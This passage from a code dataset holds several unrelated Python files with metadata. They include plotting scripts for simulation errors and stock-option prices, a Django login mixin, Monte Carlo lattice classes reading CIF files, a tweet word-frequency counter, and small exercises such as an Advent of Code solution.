np.append(U_discrete,[abs(float(U)-float(Uref))])\n\t\tt_discrete = np.append(t_discrete,[float(t)])\n\t\tt_discrete2 = np.append(t_discrete2,[float(ts)])\n\n\n#######################\n\nfilename = sys.argv[2]\n\nfile1 = open(filename, 'r') \nLines = file1.readlines() \n\nfor line in Lines: \n line_curr = line.strip()\n #print(line_curr)\n\nfib2_ref=Lines[1:2]\nfib2_adapt=Lines[3:12]\nfib2_discrete=Lines[13:23]\n\n#print(fib_ref)\n#print(fib_adapt)\n#print(fib_discrete)\n\nUref = fib2_ref[0].strip().split()[0];\n#print(Uref)\n\nU2_adapt = np.array([])\nt2_adapt = np.array([])\nt2_adapt2 = np.array([])\n\nfor line in fib2_adapt:\n\t\tU = line.strip().split()[0]\n\t\tt = line.strip().split()[2]\n\t\tts = line.strip().split()[3]\n\t\tU2_adapt = np.append(U2_adapt,[abs(float(U)-float(Uref))])\n\t\tt2_adapt = np.append(t2_adapt,[float(t)])\n\t\tt2_adapt2 = np.append(t2_adapt2,[float(ts)])\n\nU2_discrete = np.array([])\nt2_discrete = np.array([])\nt2_discrete2 = np.array([])\n\nfor line in fib2_discrete:\n\t\tU = line.strip().split()[0]\n\t\tt = line.strip().split()[2]\n\t\tts = line.strip().split()[3]\n\t\tU2_discrete = np.append(U2_discrete,[abs(float(U)-float(Uref))])\n\t\tt2_discrete = np.append(t2_discrete,[float(t)])\n\t\tt2_discrete2 = np.append(t2_discrete2,[float(ts)])\n\n\n\nef = r'$\\epsilon_f=|(U/U_{ref})-1|$'\n#######################\nfig = plt.figure()\n\nplt.xlabel(\"Error fraction \"+ef, fontsize=20)\nplt.ylabel(\"Computation time (sec)\", fontsize=20)\nplt.xscale(\"log\", nonposx='clip')\nplt.yscale(\"log\", nonposy='clip')\nplt.xlim([10**(-19),10**9])\nplt.ylim([10**(-6),10**3])\n\nplt.errorbar(U_adapt, t_adapt, fmt = 'rs', markersize=5, markerfacecolor='none', yerr=t_adapt2, label=r'$\\theta = 0 \\degree$ (fibren)')\nplt.errorbar(U_discrete, t_discrete, fmt = 'bo', markersize=5, markerfacecolor='none', yerr=t_discrete2, label=r'$\\theta = 0 \\degree$ (discrete)')\nplt.errorbar(U2_adapt, t2_adapt, fmt = 'rs', markersize=5, yerr=t2_adapt2, label=r'$\\theta = 30 \\degree$ (fibren)')\nplt.errorbar(U2_discrete, t2_discrete, fmt = 'bo', markersize=5, yerr=t2_discrete2, label=r'$\\theta = 30 \\degree$ (discrete)')\nplt.grid(linestyle='-', linewidth='0.1', color='black')\nplt.legend(loc=3)\n\nplt.savefig(\"plot_discrete.eps\", format=\"eps\", bbox_inches='tight')\n#cmd2 = \"inkscape outfile.svg --export-pdf=errtime.pdf\"\n#os.system(cmd2)\n","sub_path":"plot_errtime.py","file_name":"plot_errtime.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"372716660","text":"import random\r\n\r\ndef mutateWord(word):\r\n\tindex_modification = int(random.random() * len(word))\r\n\tif (index_modification == 0):\r\n\t\tword = chr(97 + int(26 * random.random())) + word[1:]\r\n\telse:\r\n\t\tword = word[:index_modification] + chr(97 + int(26 * random.random())) + word[index_modification+1:]\r\n\treturn word\r\n\t\r\ndef mutatePopulation(population, chance_of_mutation):\r\n\tfor i in range(len(population)):\r\n\t\tif random.random() * 100 < chance_of_mutation:\r\n\t\t\tpopulation[i] = mutateWord(population[i])\r\n\treturn population","sub_path":"mutate.py","file_name":"mutate.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"46540634","text":"import requests\nimport pygal\nfrom pygal.style import LightColorizedStyle as LCS,LightenStyle as LS\n\n\nurl = 'https://api.github.com/search/repositories?q=language:python&sort=starts'\nr = requests.get(url)\nprint('response:' ,r.status_code)\n\nresponse_dict = r.json() #API的响应,并将响应存储在一个变量里\nprint('total_count:',response_dict['total_count'])\n\nresp_dicts = response_dict['items']\nprint('responses return:',len(resp_dicts))\n\nname,starts = [],[] #创建两个空列表,用以存储放在图表中的信息\nfor resp_dict in resp_dicts:\n name.append(resp_dict['name'])\n starts.append(resp_dict['stargazers_count'])\n\nmy_style = LS('#333366',base_style = LCS)\nmy_config = pygal.Config()\nmy_config.x_label_rotation = 45\nmy_config.show_legend = False\nmy_config.title_font_size = 24\nmy_config.label_font_size = 14\nmy_config.major_label_font_size = 18\nmy_config.truncate_label = 15\nmy_config.show_y_guides = False\nmy_config.width = 1000\n\nchart = pygal.Bar(style = my_style, show_legend = False)\nchart_title ='Most starts project in 2019-11'\nchart.x_labels = name\n\nchart.add('',starts)\npath = 'D://python_github.svg'\nchart.render_to_file(path)\nprint('保存成功!保存位置在:' + path)\n\n#resp_dict = resp_dicts[0]\n#print('\\nkeys:',len(resp_dict))\n#for key in sorted(resp_dict.keys()): #提取resp_dict中一些键相关的值\n# print(key)\n\n#print(response_dict.keys())\n#\n\n\n'''print('\\nselect information about first dict') #这是显示调用的API的信息部分,接下来用pygal库可视化展示\nfor resp_dict in resp_dicts:\n print('\\nName:',resp_dict['name'])\n print('starts:',resp_dict['stargazers_count'])\n print('Owner:',resp_dict['owner']['login']) \n print('Url:',resp_dict['html_url'])\n print('Created:',resp_dict['created_at'])\n print('Updated:',resp_dict['updated_at'])\n print('Description:',resp_dict['description'])\n'''","sub_path":"(code)API_test.py","file_name":"(code)API_test.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"335191890","text":"\"\"\"\nVinícius Vilar - ADS UNIFIP - Programação 1 - Lista 2 Estrutura de Decisão\nPatos - PB | 2020\n\n6. Escreva um programa que leia um valor inteiro e calcule o seu \nquadrado.\n\n\"\"\"\n\nnum = int(input(\"Informe o número inteiro: \"))\nnumElevado = num ** 2\n\nprint(\"{} ao quadrado é {}\".format(num, numElevado))\n","sub_path":"Lista 2 - FIP/Ex06.py","file_name":"Ex06.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"652569569","text":"import os as os\nimport pandas as pd\nimport numpy as np\nimport csv\nfrom matplotlib import pyplot as plt\nfrom datetime import datetime\nfrom myReadSamples import *\nfrom mybb import *\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n#######################################################################################\n\nsavefig = False\ntest_mode = True\n\nyear_min = 2020\nyear_max = 2020\n\nmonth_min, day_min = 9, 1 # TIME WINDOW m%day, eg. 701, 1121\nmonth_max, day_max = 11, 13 # 10,30\n\n\n############ overide below #####################\n#\nmySymbol = 'LYFT'\n#\n############ overide below #####################\n\ndate_min = month_min*100 + day_min\ndate_max = month_max*100 + day_max\nx0min = 10000 * year_min + date_min\nx0max = 10000 * year_max + date_max\nx0minExp = x0min # Expiration date range\nx0maxExp = mydaylist2int( myintlist2day(x0max) + timedelta(15) ) #Contract with expiration 15 days after time window\n\nfilein = 'data3/'+mySymbol+'_bb.csv'\n\nbb_extract(mySymbol)\n######################\n\nmyStrikes = bb_get_Strikes(mySymbol)\nmyExpDates = bb_get_Exps(mySymbol)\nmyRights = ['P'] #,'P']\n\nprint(myRights)\nprint(myStrikes)\nprint(myExpDates)\n\n############ overide below to narrow range #####################\n#\nmyStrikes = [26.5] #30.0] #340.0] #[26.0]\n#\n############ overide below #####################\n\nnn = len(myExpDates)\nfor i in reversed(range(nn)):\n for date in myExpDates:\n if ((date < str(x0minExp)) | (date > str(x0maxExp))):\n myExpDates.remove(date)\n#\nif(test_mode):\n myStrikes = [myStrikes[0]]\n\n# dx0min = datetime.strptime(str(x0min), \"%Y%m%d\")\n# dx0max = datetime.strptime(str(x0max), \"%Y%m%d\")\n\nColors = ['Black', 'Red', 'Blue', 'Green', 'Cyan', 'Purple', 'Orange', 'Yellow']\n\nii = 0\n\ndf = pd.read_csv(filein, header=0)\ndf = df[(df['Date'] >= x0min) & (df['Date'] <= x0max) ]\ndf = df[(df['Date'] >= x0min) & (df['Date'] <= x0max) ]\ndf0 = df.copy()\ndf0.drop_duplicates(subset=\"Date\",keep=\"first\", inplace=True)\ndf0.reset_index(drop=True, inplace = True)\nstock = df0['UnderlyingPrice'].tolist()\nx2stock = df0['Date'].tolist()\n\nxx3 = list()\nyy3 = list()\nfor Right in myRights:\n for Strike in myStrikes:\n xx2 = list()\n yy2 = list()\n for Exp in myExpDates:\n #print('Right', Right,Strike,Exp)\n df2 = bb_read_data(df, gRight(Right), Strike, gExp(Exp))\n if (df.empty):\n break\n df4 = df0.copy()\n df4['Last'] = -999.\n nn = df2.shape[0]\n i = 0\n for i in range(nn):\n Date = df2['Date'].iloc[i]\n j = df0[df4['Date'] == Date].index[0]\n df4.iloc[j] = df2.iloc[i]\n df2 = df4.copy()\n y2 = df2['Last'].tolist()\n for i in range(len(y2)):\n if(y2[i] < 0.05 and y2[i] > -10.):\n y2[i] = np.NaN\n x2 = df2['Date'].tolist()\n x2 = list(map(str, x2))\n xx2.append(x2)\n yy2.append(y2)\n n_tickdays = get_ntickdays(x2, 20, 5) # every 5 days, but maximum tick number is 20\n plt.figure()\n Title = mySymbol + ' OPT Price at Strike ' + str(Strike) + Right + ' for Various Exp Dates'\n fig, (ax, ax2) = plt.subplots(2, 1, figsize=(10, 8), sharex=True)\n #\n ax = plt.subplot(211)\n ymax = -9999.0\n ymin = 9999.0\n for i in range(len(yy2)):\n ytemp = yy2[i].copy()\n #ytemp[np.array(ytemp) < 0] = np.NaN\n ymax = max([ymax,max(ytemp)])\n ymin = 0.0\n jj = 0 # number of lines in the OPT plot\n for Exp in myExpDates: # [0:3]:\n x2 = xx2[jj]\n y2 = yy2[jj]\n jj = jj+1\n n_tickdays = int(len(x2) / 20)\n n_tickdays = n_tickdays - (n_tickdays % 5)\n if (n_tickdays < 5):\n n_tickdays = 5\n if (n_tickdays > 20):\n n_tickdays = 20\n if (jj == 1):\n ax.scatter(x2, y2, color=Colors[jj], label='', marker='o', s=1) # to align the xlabels\n for i in range(len(y2)):\n if (y2[i] < 0.05):\n y2[i] = np.NaN\n ax.plot(x2, y2, color=Colors[jj % 7], label=Exp)\n ax.set(xlabel='Date', ylabel='Option, Price', title=Title)\n ax.xaxis.set_major_locator(ticker.MultipleLocator(n_tickdays))\n if (jj == 1):\n plt.draw()\n plt.setp(ax.get_xticklabels(), rotation=45)\n #\n cticks2 = ax.get_xticklabels()\n for i in range(len(cticks2)):\n a = cticks2[i].get_text()\n b = a[4:6] + '/' + a[6:8]\n if (i % 10 == 1):\n b = a[0:4] + '\\n' + b\n cticks2[i].set_text(b)\n ax.set_xticklabels(cticks2)\n plt.gca().yaxis.grid(True)\n plt.gca().xaxis.grid(True)\n ax.set_ylim(bottom=0, top=ymax) ############\n # ax.set_xlim(left=x0min, right=x0max) # 2+dtop)\n # ax.set_ybound(upper=ytop, lower=0.0)\n # ax.set_autoscale_on(False)\n plt.draw()\n plt.legend(loc='best')\n #\n ax2 = plt.subplot(212)\n y2 = stock\n x2 = x2stock\n x2 = list(map(str, x2))\n ax2.plot(x2, y2, color=Colors[5], label='STK')\n ax2.set(xlabel='Date', ylabel='STK, Price', title='STK')\n #\n ax2.xaxis.set_major_locator(ticker.MultipleLocator(n_tickdays))\n plt.draw()\n plt.setp(ax2.get_xticklabels(), rotation=45)\n cticks = ax2.get_xticklabels()\n for i in range(len(cticks)):\n a = cticks[i].get_text()\n b = a[4:6] + '/' + a[6:8]\n if (i % 10 == 1):\n b = a[0:4] + '\\n' + b\n cticks[i].set_text(b)\n ax2.set_xticklabels(cticks)\n plt.gca().yaxis.grid(True)\n plt.gca().xaxis.grid(True)\n # ax2.set_xlim(left=x0min, right=x0max )\n # ax2.set_autoscale_on(False)\n # #\n plt.legend(loc='best')\n #\n if (savefig):\n dir = 'figs/'+mySymbol\n if(os.path.exists(dir) == False):\n cmd = 'mkdir '+dir\n os.mkdir(dir)\n #\n savefile = 'figs/'+mySymbol+'/myplot'+'_'+ mySymbol+'_'+str(Strike)+Right+'.png'\n plt.savefig(savefile)\n print(' plot file saved as ', savefile)\n plt.show(block = False)\n plt.show()\n","sub_path":"plotOPT_bb.py","file_name":"plotOPT_bb.py","file_ext":"py","file_size_in_byte":6551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"147313155","text":"f = open(\"day1.txt\", \"r\")\r\ndata = f.read()\r\nlines = data.split('\\n')\r\n\r\nused_lines = filter(lambda line: len(line) > 0 and not line.isspace(), lines)\r\nexpenses = map(int, used_lines)\r\n\r\nfor i in range(0, len(expenses)):\r\n for j in range(i+1, len(expenses)):\r\n for k in range(j+1, len(expenses)):\r\n if expenses[i] + expenses[j] + expenses[k] == 2020:\r\n print(expenses[i] * expenses[j] * expenses[k])\r\n exit()\r\n\r\n","sub_path":"day1/day1_2.py","file_name":"day1_2.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"126969795","text":"from django.conf import settings\nfrom django.contrib.auth import REDIRECT_FIELD_NAME\nfrom django.contrib.auth.views import redirect_to_login\nfrom django.core.exceptions import ImproperlyConfigured, PermissionDenied\n\n\nclass AccessMixin(object):\n \"\"\"\n 'Abstract' mixin that gives access mixins the same customizable\n functionality.\n \"\"\"\n login_url = settings.LOGIN_URL # LOGIN_URL from project settings\n raise_exception = False # Default whether to raise an exception to none\n redirect_field_name = REDIRECT_FIELD_NAME # Set by django.contrib.auth\n\n def get_login_url(self):\n \"\"\"\n Override this method to customize the login_url.\n \"\"\"\n if self.login_url is None:\n raise ImproperlyConfigured(\n \"%(cls)s is missing the login_url. \"\n \"Define %(cls)s.login_url or override \"\n \"%(cls)s.get_login_url().\" % {\"cls\": self.__class__.__name__})\n\n return self.login_url\n\n def get_redirect_field_name(self):\n \"\"\"\n Override this method to customize the redirect_field_name.\n \"\"\"\n if self.redirect_field_name is None:\n raise ImproperlyConfigured(\n \"%(cls)s is missing the \"\n \"redirect_field_name. Define %(cls)s.redirect_field_name or \"\n \"override %(cls)s.get_redirect_field_name().\" % {\n \"cls\": self.__class__.__name__\n })\n\n return self.redirect_field_name\n\n\nclass LoginRequiredMixin(AccessMixin):\n \"\"\"\n View mixin which verifies that the user is authenticated.\n\n NOTE:\n This should be the left-most mixin of a view.\n \"\"\"\n def dispatch(self, request, *args, **kwargs):\n if not request.user.is_authenticated():\n if self.raise_exception:\n raise PermissionDenied # return a forbidden response\n else:\n return redirect_to_login(\n request.get_full_path(),\n self.get_login_url(),\n self.get_redirect_field_name())\n\n return super(LoginRequiredMixin, self).dispatch(request, *args,\n **kwargs)\n","sub_path":"minions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"229565405","text":"'''\nMonte Carlo code\nwritten by: Thien-Phuc Tu-Nguyen\nLast modified: 2017\nFile: structure\n'''\n\nimport random\nimport numpy as np\nimport math\nfrom .atom import Atom\n\n# Class for Lattice\nclass Lattice:\n def __init__(self):\n self.atoms = []\n self.internal_atoms = []\n self.a = 0.0\n self.b = 0.0\n self.c = 0.0\n self.alpha = 0.0\n self.beta = 0.0\n self.gamma = 0.0\n self.volume = 0.0\n self.symmetry_x = []\n self.symmetry_y = []\n self.symmetry_z = []\n \n def init(self):\n k = math.pi/180.0 # radian conversion\n self.volume = self.a*self.b*self.c*math.sqrt(\n 1 - math.cos(k*self.alpha)**2- math.cos(k*self.beta)**2 - math.cos(k*self.gamma)**2\n + 2 * math.cos(k*self.alpha) * math.cos(k*self.beta) * math.cos(k*self.gamma))\n self.to_cartesian = np.zeros((3,3))\n self.to_cartesian[0,0] = self.a\n self.to_cartesian[0,1] = self.b*math.cos(k*self.gamma)\n self.to_cartesian[0,2] = self.c*math.cos(k*self.beta)\n self.to_cartesian[1,1] = self.b*math.sin(k*self.gamma)\n self.to_cartesian[1,2] = self.c*(math.cos(k*self.alpha)-math.cos(k*self.beta)*math.cos(k*self.gamma))/math.sin(k*self.gamma)\n self.to_cartesian[2,2] = self.volume / (self.a*self.b*math.sin(k*self.gamma))\n self.to_internal = np.linalg.inv(self.to_cartesian)\n # Generate the atoms coordinate\n temp = []\n for atom in self.internal_atoms:\n for i in range(len(self.symmetry_x)):\n x = atom.copy()\n x.x = eval(self.symmetry_x[i].replace('x',str(atom.x)).replace('y',str(atom.y)).replace('z',str(atom.z)))\n if x.x < 0:\n x.x += 1\n if x.x > 1:\n x.x -= 1\n x.y = eval(self.symmetry_y[i].replace('x',str(atom.x)).replace('y',str(atom.y)).replace('z',str(atom.z)))\n if x.y < 0:\n x.y += 1\n if x.y > 1:\n x.y -= 1\n x.z = eval(self.symmetry_z[i].replace('x',str(atom.x)).replace('y',str(atom.y)).replace('z',str(atom.z)))\n if x.z < 0:\n x.z += 1\n if x.z > 1:\n x.z -= 1\n temp.append(x)\n # Check the repetation in temp\n self.atoms = []\n for i in range(len(temp)-1,-1,-1):\n rep = False\n atom = temp[i]\n for j in range(i-1):\n r2 = (atom.x - temp[j].x)**2 + (atom.y - temp[j].y)**2 + (atom.z - temp[j].z)**2\n if r2 < 0.0001:\n rep = True\n break\n if not rep:\n self.atoms.append(atom)\n del temp[i]\n \n def read_cif(self,file_name):\n f = open(file_name,'r')\n temp = f.readline()\n n = 0\n while temp != '':\n if temp.find('_cell_length_a') != -1:\n self.a = float(temp.split()[1])\n if temp.find('_cell_length_b') != -1:\n self.b = float(temp.split()[1])\n if temp.find('_cell_length_c') != -1:\n self.c = float(temp.split()[1])\n if temp.find('_cell_angle_alpha') != -1:\n self.alpha = float(temp.split()[1])\n if temp.find('_cell_angle_beta') != -1:\n self.beta = float(temp.split()[1])\n if temp.find('_cell_angle_gamma') != -1:\n self.gamma = float(temp.split()[1])\n if temp.find('loop_') != -1:\n n += 1\n if n == 1:\n temp = f.readline()\n temp = f.readline()\n while temp != '\\n':\n tmp = temp[(temp.find(\"'\")+1):temp.rfind(\"'\")]\n tmp = tmp.split(',')\n self.symmetry_x.append(tmp[0])\n self.symmetry_y.append(tmp[1])\n self.symmetry_z.append(tmp[2])\n temp = f.readline()\n if n == 2:\n temp = f.readline()\n while temp[:1] == '_':\n temp = f.readline()\n while temp != '\\n':\n tmp = temp.split()\n atom = Atom()\n atom.a_type = tmp[0]\n atom.x = float(tmp[2])\n atom.y = float(tmp[3])\n atom.z = float(tmp[4])\n atom.charge = float(tmp[5])\n temp = f.readline()\n self.internal_atoms.append(atom)\n temp = f.readline()\n f.close()\n \n def check(self,atom):\n coord = [atom.x,atom.y,atom.z]\n new_coord = np.dot(self.to_internal,coord)\n for i in range(3):\n while new_coord[i] < 0:\n new_coord[i] += 1\n while new_coord[i] > 1:\n new_coord[i] -= 1\n new_coord = np.dot(self.to_cartesian,new_coord)\n atom.x = new_coord[0]\n atom.y = new_coord[1]\n atom.z = new_coord[2]\n \n def shortest_r2(self,a,b):\n dx = a.x - b.x\n dy = a.y - b.y\n dz = a.z - b.z\n if dx > self.a/2:\n dx -= self.a/2\n if dx < - self.a/2:\n dx += self.a/2\n if dy > self.b/2:\n dy -= self.b/2\n if dy < - self.b/2:\n dy += self.b/2\n if dz > self.c/2:\n dz -= self.c/2\n if dz < - self.c/2:\n dz += self.c/2\n return dx**2 + dy**2 + dz**2\n\n# Class for adsorbents in lattice box\nclass Adsorbent:\n def __init__(self):\n self.atoms = []\n \n def copy_lattice(self,lattice):\n self.a = lattice.a\n self.b = lattice.b\n self.c = lattice.c\n self.alpha = lattice.alpha\n self.beta = lattice.beta\n self.gamma = lattice.gamma\n self.volume = lattice.volume\n self.to_cartesian = lattice.to_cartesian # Copy reference\n self.to_internal = lattice.to_internal # Copy reference\n \n def check(self,atom):\n coord = [atom.x,atom.y,atom.z]\n new_coord = np.dot(self.to_internal,coord)\n for i in range(3):\n if new_coord[i] < 0:\n new_coord[i] += 1\n if new_coord[i] > 1:\n new_coord[i] -= 1\n new_coord = np.dot(self.to_cartesian,new_coord)\n atom.x = new_coord[0]\n atom.y = new_coord[1]\n atom.z = new_coord[2]\n\n def shortest_r2(self,a,b):\n dx = a.x - b.x\n dy = a.y - b.y\n dz = a.z - b.z\n if dx > self.a/2:\n dx -= self.a/2\n if dx < - self.a/2:\n dx += self.a/2\n if dy > self.b/2:\n dy -= self.b/2\n if dy < - self.b/2:\n dy += self.b/2\n if dz > self.c/2:\n dz -= self.c/2\n if dz < - self.c/2:\n dz += self.c/2\n return dx**2 + dy**2 + dz**2\n\n# Lattice for adsorbent in another box\nclass Box:\n def __init__(self):\n self.atoms = []\n self.side = 0.0\n self.volume = 0.0\n \n def init(self, side, n_particle):\n self.side = side\n self.volume = side ** 3\n \n \n def check(self,atom):\n while atom.x > self.side:\n atom.x -= self.side\n while atom.x < 0:\n atom.x += self.side\n while atom.y > self.side:\n atom.y -= self.side\n while atom.y < 0:\n atom.y += self.side\n while atom.z > self.side:\n atom.z -= self.side\n while atom.z < 0:\n atom.z += self.side\n \n def shortest_r2(self, a, b):\n '''Return the shortest distance of two atom with'''\n dx = a.x - b.x\n dy = a.y - b.y\n dz = a.z - b.z\n if dx > self.side/2:\n dx -= self.side/2\n if dx < - self.side/2:\n dx += self.side/2\n if dy > self.side/2:\n dy -= self.side/2\n if dy < - self.side/2:\n dy += self.side/2\n if dz > self.side/2:\n dz -= self.side/2\n if dz < - self.side/2:\n dz += self.side/2\n return dx**2 + dy**2 + dz**2\n","sub_path":"ptmonte/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":8258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"346971357","text":"import nltk\nimport nltk.corpus \nimport string\nimport re\nimport csv\nimport time\nimport os, sys, codecs\nfrom nltk.text import Text\nfrom nltk.tokenize import TweetTokenizer\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nfrom nltk.stem import WordNetLemmatizer \n\nstart = time.time() \nlemmatizer = WordNetLemmatizer() \n\ntweet = TweetTokenizer(strip_handles=True)\n# Setting Stopwords\nstop_words = set(stopwords.words('english'))\n# Updating stop words with punctuation\nstop_words.update(['.', ',', '\"', \"'\", '?', '!', ':', ';', '(', ')', '[', ']', '{', '}','/', '-','~','&','*','<','>','=','%'])\n# updating stopwords with links\nstop_words.update(['http','httpbitly','httptinyurl','://'])\n# updating stopwords with Expressions and words of no impact\nstop_words.update(['่','ã€','ã€','。','ã€','é','|','ï¼','…','’','่','^',',',')','้','ั','#p2','。','’','#tcot','ั','ã€','่','via','、'])\n# updating stopwords with Contractions\nstop_words.update([\"i've\",\"that's\",\"can't\", \"i'll\", \"i'm\",'que',\"i'm\",'your',\"you're\",\"i'd\",\"i'm\"])\n# updating stopwords with Digits\nstop_words.update(['0','1','2','3','4','5','6','7','8','9','10','0'])\n# updating stopwords with Bot Words\nstop_words.update(['handsome','Mystery','Sexy','Best','Free','Cute','Avaiable','attractive','free','sexy','hot','win','avaiable','cute',])\n\n\n\n\n\nDATA_PATH = 'Thesis\\\\Files\\\\'\nlemmatizer = WordNetLemmatizer()\n# file_name = 'RiskTweets.txt'\n\nfile_name = '../Files/RiskTweets.txt'\n\nPOSITIVES = set()\nNEGATIVES = set()\n\ndef remove_bom_inplace(filepath):\n \"\"\"Removes BOM mark, if it exists, from a file and rewrites it in-place\"\"\"\n buffer_size = 4096\n bom_length = len(codecs.BOM_UTF8)\n \n with open(filepath, \"r+b\") as fp:\n chunk = fp.read(buffer_size)\n if chunk.startswith(codecs.BOM_UTF8):\n i = 0\n chunk = chunk[bom_length:]\n while chunk:\n fp.seek(i)\n fp.write(chunk)\n i += len(chunk)\n fp.seek(bom_length, os.SEEK_CUR)\n chunk = fp.read(buffer_size)\n fp.seek(-bom_length, os.SEEK_CUR)\n fp.truncate()\n\n\ndef directorySkip(s=DATA_PATH):\n\tpath = os.path.dirname(os.path.abspath(__file__))\n\tif type(path) == str:\n\t\ti,j = len(path),0\n\t\twhile (j!=2):\n\t\t\ti = i-1\n\t\t\tif path[i] == '\\\\':\n\t\t\t\tj = j + 1\n\t\treturn path[0:i+1] + s\n\treturn None\n\ndef getDataPath(s, endtag='.txt'):\n\tpath = directorySkip() + s + endtag\n\treturn path\n\ndef loadFile(s, endtag='.txt'):\n\tlist = []\n\twith open(getDataPath(s, endtag=endtag), \"r\") as file:\n\t\tfor line in file:\n\t\t\tlist.append(line.replace('\\n', ''))\n\treturn list\n\nPOSITIVES = set(loadFile(\"positives\"))\nNEGATIVES = set(loadFile(\"negatives\"))\n\n# def get_emotwordlist(filepath):\n # with open(filepath, 'r', encoding=\"utf8\",errors='ignore') as f:\n # emotwordlist = [word.strip().lower() for word in f.read().split('\\n') if len(word.strip()) > 1]\n # print(*emotwordlist)\n # return emotwordlist\n\ndef alter_prolonged(list):\n\tlemmatizer = WordNetLemmatizer()\n\tres = list.copy()\n\tfor v in range(len(list)):\n\t\ti = 0\n\t\tj = -1\n\t\tw = list[v]\n\t\twhile(i + 2 < len(w)):\n\t\t\tif (w[i] == w[i+1] and w[i+1] == w[i+2]):\n\t\t\t\tw = w[:i] + w[(i+1):]\n\t\t\t\tj = i\n\t\t\telse:\n\t\t\t\ti+= 1\n\t\tif (not (w in POSITIVES or w in NEGATIVES)) and j != -1:\n\t\t\tw = w[:j] + w[(j+1):]\n\t\ttry:\n\t\t\tres[v] = lemmatizer.lemmatize(w)\n\t\texcept:\n\t\t\tprint(\"Could not lemmatize word '\" + w + \"'\")\n\t\t\tres[v] = w\n\t\t\tpass\n\treturn res\n\n\nwith open(file_name, 'r', encoding=\"utf8\",errors='ignore') as f:\n text = f.read()\n # remove punctuation from each word (What's -> Whats)\n list_of_words = [i.lower() for i in tweet.tokenize(text) if i.lower() not in stop_words]\n\n list_of_words = alter_prolonged(list_of_words)\n\n global wordcount\n\n wordcount = (len(list_of_words))\n\n fdist = Counter(list_of_words)\n\n dist = fdist.most_common(10000)\n\n RiskWords = '../Output/Risk/RiskWords.csv'\n\n with open(RiskWords, 'w', encoding=\"utf8\",errors='ignore') as csvFile:\n \tcsv_out = csv.writer(csvFile, delimiter=\",\", lineterminator=\"\\r\\n\")\n \tcsv_out.writerow(['Name','Count'])\n \tfor row in dist:\n \t\t csv_out.writerow(row)\n\n with open('../Output/Risk/RiskWords.txt', 'w', encoding=\"utf8\",errors='ignore') as File:\n \tFile.write(('\\n'.join('%s %s' % x for x in dist)))\n\n # emotword_set = set(get_emotwordlist('EmotionalWords.txt'))\n emotword_set = NEGATIVES\n emot_fdist = Counter()\n\n # filtering non emotional words\n for word in emotword_set:\n if word in fdist:\n emot_fdist[word] = fdist[word]\n \n\n\n\n dist = emot_fdist.most_common(10000)\n\n RiskNegatives = '../Output/Risk/RiskNegatives.csv'\n\n # rt = retweet\n with open(RiskNegatives, 'w', encoding=\"utf8\",errors='ignore') as csvFile:\n \tcsv_out = csv.writer(csvFile, delimiter=\",\", lineterminator=\"\\r\\n\")\n \tcsv_out.writerow(['Name','Count'])\n \tfor row in dist:\n \t\t csv_out.writerow(row)\n \t\t # rt = retweet \n\n with open('../Output/Risk/RiskNegatives.txt', 'w', encoding=\"utf8\",errors='ignore') as File:\n \tFile.write(('\\n'.join('%s %s' % x for x in dist)))\n\n \n # emotword_set = set(get_emotwordlist('EmotionalWords.txt'))\n emotword_set = POSITIVES\n emot_fdist = Counter()\n\n # filtering non emotional words\n for word in emotword_set:\n if word in fdist:\n emot_fdist[word] = fdist[word] \n\n\n\n dist = emot_fdist.most_common(10000)\n\n RiskPositives = '../Output/Risk/RiskPositives.csv'\n\n# rt = retweet\n with open(RiskPositives, 'w', encoding=\"utf8\",errors='ignore') as csvFile:\n \tcsv_out = csv.writer(csvFile, delimiter=\",\", lineterminator=\"\\r\\n\")\n \tcsv_out.writerow(['Name','Count'])\n \tfor row in dist:\n \t\t csv_out.writerow(row)\n\n\n# rt = retweet \n with open('../Output/Risk/RiskPositives.txt', 'w', encoding=\"utf8\",errors='ignore') as File:\n \tFile.write(('\\n'.join('%s %s' % x for x in dist)))\n\n\n\n\nremove_bom_inplace('../Output/Risk/RiskNegatives.csv')\nremove_bom_inplace('../Output/Risk/RiskPositives.csv')\nremove_bom_inplace('../Output/Risk/RiskWords.csv')\n\n\nend = time.time()\nseconds = (end - start)\nminutes = (seconds/60)\nprint(\"ControlFreq Script Done\")\nprint(\"This Script took \" + str(minutes) + \" To run\")\nprint(\"The Text Corpus Contatins \" + str(wordcount) + \" Words\")\n","sub_path":"Tools/RiskFreq.py","file_name":"RiskFreq.py","file_ext":"py","file_size_in_byte":6393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"451344666","text":"import csv\n\ndef stations(stations_csv):\n \"\"\"returns list of all stations with corresponding coordinates\"\"\"\n\n # create empty list\n stations = list()\n\n # open csv file with stations\n with open (stations_csv) as file_stations:\n\n # read csv file and return list of columns\n read_stations = csv.DictReader(file_stations)\n\n # iterate over rows and append to list\n for row in read_stations:\n stations.append(row)\n\n return stations\n\ndef railroads(railroads_csv):\n \"\"\"returns list of all railroads between stations\"\"\"\n\n # create empty list\n railroads = list()\n\n # open csv file with connections\n with open (railroads_csv) as file_railroads:\n\n # read csv file and return list of columns\n read_railroads = csv.DictReader(file_railroads)\n\n # iterate over rows and append to list\n for row in read_railroads:\n railroads.append(row)\n\n return 